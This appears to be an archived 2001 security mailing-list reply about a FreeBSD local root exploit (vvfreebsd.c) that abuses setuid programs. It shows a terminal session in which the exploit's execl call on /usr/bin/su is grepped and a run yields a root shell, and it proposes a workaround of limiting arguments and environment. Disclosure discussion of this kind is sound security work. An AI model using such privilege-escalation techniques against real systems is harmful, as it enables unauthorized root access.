> Well, after a bunch of tests I've found only two suids which gave me > suid shell: > /usr/bin/passwd > /usr/local/bin/ssh1 /usr/bin/su also works for me: riget:venglin:~> egrep -e execl vvfreebsd.c if(!execl("/usr/bin/su","su","szymon",0)) riget:venglin:~> ./v vvfreebsd. Written by Georgi Guninski shall jump to bfbffe72 child=57660 Password:done # id uid=0(root) gid=1001(users) groups=1001(users), 99(rexec) > So, quick workaround should be Quick workaround is to limit arguments, environment and filter non-ascii characters: http://www.frasunek.com/sources/security/rexec/ -- * Fido: 2:480/124 ** WWW: http://www.frasunek.com/ ** NIC-HDL: PMF9-RIPE * * Inet: przemyslawat_private ** PGP: D48684904685DF43EA93AFA13BE170BF *
This archive was generated by hypermail 2b30 : Wed Jul 11 2001 - 07:57:44 PDT